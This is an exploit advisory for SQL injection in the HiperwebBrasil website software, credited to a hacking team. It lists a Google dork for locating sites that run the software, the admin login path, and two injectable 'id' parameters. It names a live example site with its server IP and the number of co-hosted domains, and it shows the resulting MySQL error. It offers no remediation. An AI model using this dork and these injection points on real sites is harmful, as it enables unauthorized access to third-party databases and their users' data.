HiperwebBrasil SQL Injection

1. #######################################################
2.  
3. # Exploit Title : HiperwebBrasil SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 17/01/2019
7. # Vendor Homepage : hiperwebbrasil.com.br - twitter.com/Hiperweb
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Hiperweb Brasil'' site:br
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. #######################################################
16.  
17. # Admin Panel Login Path :
18. *************************
19. /admin/
20.  
21. # SQL Injection Exploit :
22. ***********************
23.  
24. /noticias.php?id=[SQL Injection]
25.  
26. /conc_encontre.php?id=[SQL Injection]
27.  
28. #######################################################
29.  
30. # Example Vulnerable Site :
31. *************************
32.  
33. [+] sincodiv-rj.com.br/noticias.php?id=67%27 =>
34.  
35. [ Proof of Concept ] => archive.is/DqTlc
36.  
37. Note => (177.70.106.69) => There are 186 domains hosted on this server.
38.  
39. #######################################################
40.  
41. # SQL Database Error :
42. **********************
43.  
44. You have an error in your SQL syntax; check the manual that
45. corresponds to your MySQL server version for
46. the right syntax to use near ''67''' at line 1
47.  
48. #######################################################
49.  
50. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
51.  
52. #######################################################